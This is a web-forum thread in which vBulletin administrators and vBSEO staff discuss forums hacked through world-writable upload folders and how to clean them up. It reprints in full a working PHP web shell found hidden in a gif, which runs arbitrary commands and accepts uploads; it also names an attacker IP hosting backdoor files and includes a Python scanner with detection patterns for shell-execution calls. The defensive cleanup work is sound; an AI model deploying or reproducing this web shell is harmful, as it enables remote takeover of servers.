
Security issue

This is a discussion on Security issue within the Bug Reporting forums, part of the vBSEO SEO Plugin category; Thanks for all the help. So I got rid of the exploit, got the .htaccess password working and renamed admincp. ...

  1. #241
    Junior Member
    Real Name
    Tim
    Join Date
    Jul 2008
    Posts
    18
    Liked
    0 times
    Thanks for all the help. So I got rid of the exploit, got the .htaccess password working and renamed admincp. Next I guess I should update from 3.8.4 pl2 to 3.8.5. Is that even necessary to prevent this exploit or will the steps I've just taken kill it for good?

  2. #242
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    No one is 100% sure where the exploit is. Everything points at folder security.
    Make sure all your chmod 777 (writable) directories have:
    vBSEO Security Bulletin - vBSEO 3.3.2 Released
    in place in an htaccess file
    and that you do NOT allow zip or other executable uploads.

  3. #243
    Junior Member
    Real Name
    Tim
    Join Date
    Jul 2008
    Posts
    18
    Liked
    0 times
    Quote Originally Posted by Brian Cummiskey View Post
    No one is 100% sure where the exploit is. Everything points at folder security.
    Make sure all your chmod 777 (writable) directories have:
    vBSEO Security Bulletin - vBSEO 3.3.2 Released
    in place in an htaccess file
    and that you do NOT allow zip or other executable uploads.

    I have attachments stored in the DB. Would it be better to move them to the file system and secure it with the .htaccess? Isn't it conceivable that the exploit could be in an attachment stored in the DB?

  4. #244
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    DB storage is not affected.

    But, it's more than just attachments... it's ANY folder that is 777.
    check your avatar storage type, any data/uploads/etc from galleries, profile pics, any add ons, etc etc, and any folders outside of vb too.

    That said,

    I would recommend using the filesystem over DB for performance reasons. The file system is far better at managing, you guessed it, files than a DB is.
    The only downfall is backups. Now, your db dump will not contain your attachments/etc., so you will need to back up your file system as well.

  5. #245
    Senior Member Lee G's Avatar
    Real Name
    Lee
    Join Date
    Sep 2006
    Location
    Costa Blanca
    Posts
    690
    Liked
    40 times
    Blog Entries
    4
    Finally getting some traffic come back. Very slowly, but there is a slight return.
    Plus, while I have been in dire trouble, reading one or two of Brian's recommendations on forum settings might speed it up a bit.
    Things like taking the fluff out of the sitemap etc
    Not a brilliant return, but it is returning.

    Thanks to all who jumped in and helped when I found that I had been hacked.
    Very much appreciated guys and gals.

  6. #246
    Senior Member Lee G's Avatar
    Real Name
    Lee
    Join Date
    Sep 2006
    Location
    Costa Blanca
    Posts
    690
    Liked
    40 times
    Blog Entries
    4
    Quick update on this. I found a rogue file on my server yesterday called matilde_clovis.php. This was in a vB-unrelated folder though, and it is full of base64_decode.

    Looking at VB license rules, you can also change the copyright notice to an image, so you have less chance of being picked up by a casual search for vbulletin copyright
    The "power by vbulletin" footer is a trouble maker

  7. #247
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    Even without the footer, it's very simple to find vB sites... just search Google for strings like "vbulletin_css"

  8. #248
    Junior Member
    Real Name
    ayyih
    Join Date
    Jun 2008
    Posts
    2
    Liked
    0 times
    Hello everyone,

    After an investigation, due to the infection my vBulletin forums got, I found the source of the problem, at least for my case.

    I discovered that someone used shell commands somehow and wrote the malicious "base64" code in some PHP files.

    The IP of the attacker is 195.78.109.97. He used "wget" commands to download the malicious code from his server to mine; you can see it here (http://195.78.109.97/shell.txt) or here (http://195.78.109.97/shell2.txt). Kaspersky doesn't allow me to open the second one because it contains a virus named Backdoor-PHP or something like that.

    He used both files to write into some of my PHP files, or to create new PHP files containing this code; he also chmoded all my website's PHP and JS files.

    For my case I used a grep command to find infected files: "grep -r 'base64_decode' /path/to/your/web/directory/* > /path/to/logfile.txt"

    All the paths of the files containing base64_decode will be listed in the logfile. You should then investigate whether it is just normal "base64_decode" code or the same as "shell.txt", then remove all the infected code or the file itself, then investigate if there is a 666 chmod for files or 777 for directories that mustn't be, and rechmod them to the right one.

    Also create in the 777-chmoded directories a .htaccess containing

    <Files ~ "\.(php\d*|cgi|pl|phtml)$">
    order allow,deny
    deny from all
    </Files>

    to deny queries for other scripts.

    That's all I did, and till now everything is right.

  9. #249
    Senior Member
    Real Name
    serphog
    Join Date
    Oct 2005
    Posts
    166
    Liked
    0 times
    Blog Entries
    1
    Count me among those that were hit. Definitely on one site and maybe on another. Google result will show homepage of site and redirect to MyFileStore.com.

    I looked in global_start and didn't find anything. I've also got Joomla installed with vB. I reinstalled vBSEO and have no idea if I removed the issue.

    Oddly enough, it doesn't hit the redirect each time. That being said, I just used a brand new phone today and it redirected, so it was there earlier today.

    I too was wondering where all my traffic has been.

  10. #250
    vBSEO Staff Brian Cummiskey's Avatar
    Real Name
    Brian Cummiskey
    Join Date
    Jul 2009
    Location
    btwn NYC and Boston
    Posts
    12,789
    Liked
    657 times
    Blog Entries
    2
    These redirects are stored in cookies so it only happens once.

    Clear out all your cookies for your domain to see if it happens.

    Also, make sure you have all your writable files and folders locked down as this thread suggests (starting back on page 6 or so), as this seems to be how they are getting in.

    And once done, change all your passwords, including your server root and db passwords, as they may have gotten all of your login credentials.

  11. #251
    wac
    Senior Member
    Real Name
    toto
    Join Date
    Apr 2009
    Posts
    134
    Liked
    0 times
    where exactly is that global start file located?

  12. #252
    vBSEO Staff Oleg Ignatiuk's Avatar
    Real Name
    Oleg Ignatiuk
    Join Date
    Jun 2005
    Location
    Belarus
    Posts
    25,744
    Liked
    168 times
    Hello,

    that is not a file, but vB plugin that can be located in vB admincp->Plugins list (it's actually stored in database).

  13. #253
    Senior Member
    Real Name
    John
    Join Date
    Dec 2005
    Posts
    762
    Liked
    30 times
    I just found a gif file with this shell code embedded in it:
    Code:
    <?php
     ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br>
    </pre>
    <form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
    	/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
    </form><br>
    <form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
    	pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
    </form>
    <form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
    	upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
    </form>
    <script>document.getElementById("bash").focus();</script>
    </font>
    <?php
     $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>
    Fun

    I removed the image, banned user, and added the .htaccess above to the 777 directories.
    Last edited by tavenger5; 05-12-2010 at 09:57 PM.
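    Added example, not code from the thread or from vBulletin/vBSEO: a small Python triage scanner that automates the checks discussed in posts #248 and #253. It runs the base64_decode search (plus eval and the shell-execution calls the web shell above relies on) over PHP/JS files, audits 666 files and 777 directories, verifies that every world-writable directory carries a .htaccess that refuses script requests, and looks for PHP open tags hidden inside image uploads like the gif above. The same indicator check also works on a plugin's phpcode string, since the global_start plugin lives in the database rather than in a file. Every path, file name and payload string in build_fixture() is constructed for the demo; nothing in it is taken from a real server.

```python
"""Triage scanner for a compromised PHP web root (added example, not from the thread)."""
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicator patterns. A hit means "inspect by hand", not "infected": vBulletin
# itself calls base64_decode legitimately, as post #248 points out.
INDICATORS = [
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I)),
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("pcntl_exec", re.compile(r"\bpcntl_exec\s*\(", re.I)),
    ("passthru", re.compile(r"\bpassthru\s*\(", re.I)),
    ("popen", re.compile(r"\bpopen\s*\(", re.I)),
    ("shell_exec", re.compile(r"\bshell_exec\s*\(", re.I)),
]
CODE_SUFFIXES = {".php", ".phtml", ".inc", ".js"}
IMAGE_SUFFIXES = {".gif", ".png", ".jpg", ".jpeg"}
PHP_TAG = re.compile(rb"<\?php|<\?=", re.I)
# The .htaccess from post #248: refuse to serve script files from an upload directory.
HTACCESS_DENY = '<Files ~ "\\.(php\\d*|cgi|pl|phtml)$">\norder allow,deny\ndeny from all\n</Files>\n'


def scan_text(text: str) -> list:
    """Return the indicator names present in a PHP/JS source string (file or plugin phpcode)."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def php_in_image(path: Path) -> bool:
    """True if an image file carries a PHP open tag (an image/PHP polyglot like the gif in #253)."""
    return PHP_TAG.search(path.read_bytes()) is not None


def world_writable(path: Path) -> bool:
    """True for mode 666 files / 777 directories (the 'other' write bit is set)."""
    return bool(path.lstat().st_mode & stat.S_IWOTH)


def htaccess_blocks_scripts(directory: Path) -> bool:
    """Heuristic: a .htaccess that denies php-style files, or turns the PHP engine off."""
    ht = directory / ".htaccess"
    if not ht.is_file():
        return False
    text = ht.read_text(errors="replace").lower()
    deny_block = "<files" in text and "php" in text and "deny from all" in text
    return deny_block or "php_flag engine off" in text


def scan_webroot(root: Path) -> dict:
    """Walk the tree and collect findings by type; all paths are relative to root."""
    report = {"code_hits": {}, "php_in_images": [], "writable_unprotected": [], "writable_files": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        if world_writable(d) and not htaccess_blocks_scripts(d):
            report["writable_unprotected"].append(d.relative_to(root).as_posix())
        for name in filenames:
            f = d / name
            if f.is_symlink():
                continue
            rel = f.relative_to(root).as_posix()
            if world_writable(f):
                report["writable_files"].append(rel)
            suffix = f.suffix.lower()
            if suffix in CODE_SUFFIXES:
                hits = scan_text(f.read_text(errors="replace"))
                if hits:
                    report["code_hits"][rel] = hits
            elif suffix in IMAGE_SUFFIXES and php_in_image(f):
                report["php_in_images"].append(rel)
    for key in ("php_in_images", "writable_unprotected", "writable_files"):
        report[key].sort()
    return report


def _put(path: Path, data, mode: int) -> None:
    """Write a fixture file with an explicit mode so the demo does not depend on umask."""
    path.write_bytes(data) if isinstance(data, bytes) else path.write_text(data)
    path.chmod(mode)


def build_fixture() -> Path:
    """Construct a throwaway web root reproducing the thread's symptoms (all contents invented)."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    _put(root / "index.php", "<?php require('./global.php'); ?>", 0o644)
    _put(root / "config.php", "<?php $config['Database']['dbname'] = 'forum'; ?>", 0o666)  # 666: too loose
    for sub, mode in (("includes", 0o755), ("images", 0o755), ("attachments", 0o777), ("uploads", 0o777)):
        (root / sub).mkdir()
        (root / sub).chmod(mode)
    # Constructed stand-in for the dropped file named in post #246; the payload is a placeholder.
    _put(root / "includes" / "matilde_clovis.php", "<?php eval(base64_decode('PAYLOAD_PLACEHOLDER')); ?>", 0o644)
    # Legitimate-looking use of base64_decode: reported as a hit that needs manual triage.
    _put(root / "includes" / "functions.php", "<?php $d = unserialize(base64_decode($row['data'])); ?>", 0o644)
    _put(root / "uploads" / ".htaccess", HTACCESS_DENY, 0o644)  # 777 dir, but protected
    _put(root / "images" / "profilepic605_1.png", b"\x89PNG\r\n\x1a\n" + b"<?php echo 'polyglot'; ?>", 0o644)
    _put(root / "images" / "ok.gif", b"GIF89a" + b"\x00" * 16, 0o644)
    return root


if __name__ == "__main__":
    for kind, findings in scan_webroot(build_fixture()).items():
        print(f"{kind}: {findings}")
```

    Point scan_webroot() at the real document root and treat each list as a work queue: code_hits need eyeballing (matilde_clovis.php style `eval(base64_decode(...))` is the pattern from the thread, while functions.php is a benign decode), php_in_images should simply be deleted, writable_unprotected directories get the .htaccess from post #248, and writable_files get chmod 644. The .htaccess check is a heuristic and only matters where Apache honours AllowOverride for that directory.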

  14. #254
    GGG
    Member
    Real Name
    ddgfg dgdgdfgfg
    Join Date
    Jan 2007
    Posts
    60
    Liked
    0 times
    I only found one "global_start" and that was vBSEO Global Start with this code:

    "if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('global_start');"

    Does that mean I am not infected?

    Quote Originally Posted by CThiessen View Post
    Hi,
    it is vBulletin related but it is not in the files its stored in the database:
    You need to go to your AdminCP:
    Entra - JustOverclock.com - vBulletin Pannello Admin

    and then - Text in Italian or English?:
    Attachment 6987

    Greetings
    Christian

  15. #255
    GGG
    Member
    Real Name
    ddgfg dgdgdfgfg
    Join Date
    Jan 2007
    Posts
    60
    Liked
    0 times
    Oops, will check global_ plugins as well. I'll be back in a min.

    Quote Originally Posted by GGG View Post
    I only found one "global_start" and that was vBSEO Global Start with this code:

    "if(defined('VBSEO_ENABLED'))
    vbseo_complete_sec('global_start');"

    Does that mean I am not infected?
